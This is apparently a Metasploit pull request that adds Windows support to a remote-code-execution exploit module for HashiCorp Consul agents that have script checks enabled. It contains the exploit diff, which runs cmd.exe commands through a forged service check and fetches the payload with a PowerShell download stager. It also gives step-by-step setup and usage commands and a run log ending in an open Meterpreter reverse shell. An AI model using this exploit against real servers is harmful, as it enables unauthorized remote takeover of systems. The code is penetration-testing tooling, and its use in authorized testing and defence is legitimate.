### PR TITLE
Add Windows target to consul_service_exec.rb

### DIFF
--- a/modules/exploits/multi/misc/consul_service_exec.rb
+++ b/modules/exploits/multi/misc/consul_service_exec.rb
@@ -29,9 +29,9 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://www.consul.io/api/agent/service.html' ],
           [ 'URL', 'https://github.com/torque59/Garfield' ]
         ],
-      'Targets'         => 
-        [  
-          [ 'Linux', 
+      'Targets'         =>
+        [
+          [ 'Linux',
             {
               'Platform' => 'linux',
               'CmdStagerFlavor' => ['bourne', 'echo', 'printf', 'curl', 'wget']

--- a/modules/exploits/multi/misc/consul_service_exec.rb
+++ b/modules/exploits/multi/misc/consul_service_exec.rb
@@ -21,17 +21,29 @@ class MetasploitModule < Msf::Exploit::Remote
         [
           'Bharadwaj Machiraju <bharadwaj.machiraju[at]gmail.com>', # Discovery and PoC
           'Francis Alexander <helofrancis[at]gmail.com >', # Discovery and PoC
-          'Quentin Kaiser <kaiserquentin[at]gmail.com>' # Metasploit module
+          'Quentin Kaiser <kaiserquentin[at]gmail.com>', # Metasploit module
+          'Matthew Lucas <mattglucas97[at]gmail.com>' # Windows support for Metasploit module
         ],
       'References'     =>
         [
           [ 'URL', 'https://www.consul.io/api/agent/service.html' ],
           [ 'URL', 'https://github.com/torque59/Garfield' ]
         ],
-      'Platform'        => 'linux',
-      'Targets'         => [ [ 'Linux', {} ] ],
+      'Targets'         => 
+        [  
+          [ 'Linux', 
+            {
+              'Platform' => 'linux',
+              'CmdStagerFlavor' => ['bourne', 'echo', 'printf', 'curl', 'wget']
+            }],
+             [ 'Windows',
+             {
+              'Platform' => 'win',
+              'CmdStagerFlavor' => 'psh_invokewebrequest'
+             }]
+          ],
+
       'Payload'         => {},
-      'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf', 'curl', 'wget'],
       'Privileged'     => false,
       'DefaultTarget'  => 0,
       'DisclosureDate' => '2018-08-11'))
@@ -82,6 +94,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # NOTE: Timeout defines how much time the check script will run until
     # getting killed. Arbitrarily set to one day for now.
+    case target.name
+    when /Linux/
+      arg1 = "sh"
+      arg2 = "-c"
+    when /Windows/
+      arg1 = "cmd.exe"
+      arg2 = "/c"
+    end
     res = send_request_cgi({
       'method' => 'PUT',
       'uri' => normalize_uri(uri, 'v1/agent/service/register'),
@@ -95,8 +115,7 @@ class MetasploitModule < Msf::Exploit::Remote
         :Address => "127.0.0.1",
         :Port => 80,
         :check => {
-          :script => "#{cmd}",
-          :Args => ["sh", "-c", "#{cmd}"],
+          :Args => [arg1, arg2, "#{cmd}"],
           :interval => "10s",
           :Timeout => "86400s"
         }


### PR DESCRIPTION
## Summary

QKaiser added this exploit for Hashicorp Consul running on Linux target servers in the PR https://github.com/rapid7/metasploit-framework/pull/10443

This PR adds support for targeting Windows servers by slightly generalising the payload delivery and adding Windows to the list of targets, with some small changes to accommodate the addition.

The vulnerability is the same, if -enable-script-checks is used, the target is vulnerable to RCE. This module employs that to deploy a Metasploit payload on the server. 

PshInvokeWebRequest is used for delivery rather than echo because the characters present in the echo method frequently broke the HTTP requests that perform the exploit without the use of very hacky workarounds.

## Target Setup
The easiest way to set up a vulnerable Consul server for testing is using Chocolatey on a Windows VM. From an admin cmd, do:

1. `choco install consul`
2. `sc stop Consul`
3. `consul agent -enable-script-checks --data-dir=C:\ProgramData\consul\data -client <Windows VM IP address>`

The IP address used for -client should be the VM IP address that your Metasploit environment can reach. Data-dir can be any directory, including empty ones, but must be included. This is not the way real life vulnerable Consul instances are set up but it makes for a quick and easy test environment. 

To test if your vulnerable Consul environment has been successfully set up, navigate to `http://<Windows VM IP>:8500/v1/agent/self` from your attacker/Metasploit VM and check if "EnableRemoteScriptChecks" is set to "True".

## Verification Steps

1. `./msfconsole`
2. `use exploit/multi/misc/consul_service_exec`
3. `set target 1`
4. `set payload <windows payload>`
5. `set lhost <lhost>`
6. `set rhosts <rhosts>`
7. `run`

A shell corresponding to your chosen payload should be returned from the target Windows server.

## Scenarios

```
msf6 exploit(multi/misc/consul_service_exec) > options

Module options (exploit/multi/misc/consul_service_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   ACL_TOKEN                   no        Consul Agent ACL token
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8500             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  <LHOST>   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux

msf6 exploit(multi/misc/consul_service_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Linux
   1   Windows


msf6 exploit(multi/misc/consul_service_exec) > set target 1
target => 1
msf6 exploit(multi/misc/consul_service_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/misc/consul_service_exec) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/misc/consul_service_exec) > set RHOSTS <RHOSTS>
RHOSTS => <RHOSTS>
msf6 exploit(multi/misc/consul_service_exec) > run

[*] Started reverse TCP handler on <LHOST>:4444 
[*] Using URL: http://0.0.0.0:8080/KhZiQi
[*] Local IP: http://127.0.0.1:8080/KhZiQi
[*] Creating service 'kbrOpLCuT'
[*] Service 'kbrOpLCuT' successfully created.
[*] Waiting for service 'kbrOpLCuT' script to trigger
[*] Client <RHOSTS> (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.14393.3866) requested /KhZiQi
[*] Sending payload to <RHOSTS> (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.14393.3866)
[*] Sending stage (175174 bytes) to <RHOSTS>
[*] Meterpreter session 3 opened (<LHOSTS>:4444 -> <RHOSTS>:52823) at 2020-11-17 15:54:18 +0000
[*] Removing service 'kbrOpLCuT'
[*] Command Stager progress - 100.00% done (146/146 bytes)
[*] Server stopped.

meterpreter > 

```

